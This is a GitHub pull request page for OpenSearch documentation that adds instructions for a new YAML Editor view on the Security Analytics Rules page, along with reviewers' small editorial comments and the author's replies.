-
Notifications
You must be signed in to change notification settings - Fork 445
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add new Rules documentation that covers YAML Editor view #2407
Conversation
Signed-off-by: cwillum <cwmmoore@amazon.com>
Waiting a while longer for Doc Review to see if I can get a Tech Review first today. |
_security-analytics/usage/rules.md
Outdated
@@ -17,7 +17,27 @@ When you open the Rules page, all rules are listed in the table. Use the search | |||
Alternatively, you can use the **Rule type**, **Rule severity**, and **Source** dropdown menus to drill down in the list of alerts and filter for preferred results. You can use all three menus in combination to narrow results. Select only one option per menu. |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Select only one option per menu.
I must have missed this during my initial read of the documentation. The filter menus for this table support selecting multiple options (e.g., the table can be filtered to display only Critical
, and Low
severity rules).
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Operator error. Yes, pick as many as you'd like. Thanks. Reworded this statement.
_security-analytics/usage/rules.md
Outdated
|
||
If you choose to create the rule manually, you can refer to Sigma's [Rule Creation Guide](https://github.com/SigmaHQ/sigma/wiki/Rule-Creation-Guide) to help understand details for each field. | ||
* By default, the Visual Editor is displayed. Enter the appropriate content in each field and select **Create** in the lower-right corner of the window to save the rule. | ||
* the Create a rule window also provides the YAML Editor so that you can create the rule directly in a YAML file format. Select **YAML Editor** and then enter information for the pre-populated field types. |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Small typo: Should this bullet point start capital T
?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Yup. Thank you.
Signed-off-by: cwillum <cwmmoore@amazon.com>
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
LGTM.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Looks good to me. I forwarded this PR to the rest of the security analytics team in case they have any feedback.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Minimal comments; LGTM
_security-analytics/usage/rules.md
Outdated
* By default, the Visual Editor is displayed. Enter the appropriate content in each field and select **Create** in the lower-right corner of the window to save the rule. | ||
* The Create a rule window also provides the YAML Editor so that you can create the rule directly in a YAML file format. Select **YAML Editor** and then enter information for the pre-populated field types. | ||
|
||
The alternatives to manually creating a rule, however, make the process easier and faster. They involve either importing a rule in a YAML file or duplicating an existing rule and customizing it. See the next two sections for detailed steps. |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Per the style guide, we should avoid terms like "easier" Suggestion: "..., however, simplify and speed up the process."
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I like it.
_security-analytics/usage/rules.md
Outdated
<br><img src="{{site.url}}{{site.baseurl}}/images/Security/rule-dup2.png" alt="Opening the rule details pane" width="500"> | ||
1. Select the **Duplicate** button in the upper-right corner of the pane. The Duplicate rule window opens in Visual Editor view and all of the fields are automatically populated with the rule's details. Details are also populated in YAML Editor view. | ||
<br><img src="{{site.url}}{{site.baseurl}}/images/Security/dupe-rule.png" alt="Selecting the duplicate button opens the Duplicate rule window" width="500"> | ||
1. In either Visual Editor view or YAML Editor view, modify any of the fields to customize the rule. | ||
1. After performing any modifications to the rule, select the **Create** button in the lower-right corner of the window. A new and customized rule is created, and it appears in the list of rules on the main page of the Rules window. |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Replace double space between "A" and "new" with single space.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Good catch
Signed-off-by: cwillum <cwmmoore@amazon.com>
* fix#2400-yaml-editor-rules Signed-off-by: cwillum <cwmmoore@amazon.com> * fix#2400-yaml-editor-rules Signed-off-by: cwillum <cwmmoore@amazon.com> * fix#2400-yaml-editor-rules Signed-off-by: cwillum <cwmmoore@amazon.com> Signed-off-by: cwillum <cwmmoore@amazon.com>
…)" This reverts commit 39fa3b9.
Signed-off-by: cwillum cwmmoore@amazon.com
Description
A new YAML Editor view has been added for 2.5 on the Rules page for Security Analytics.
Issues Resolved
Added new content and added or updated screenshots to include the new feature.
Checklist
For more information on following Developer Certificate of Origin and signing off your commits, please check here.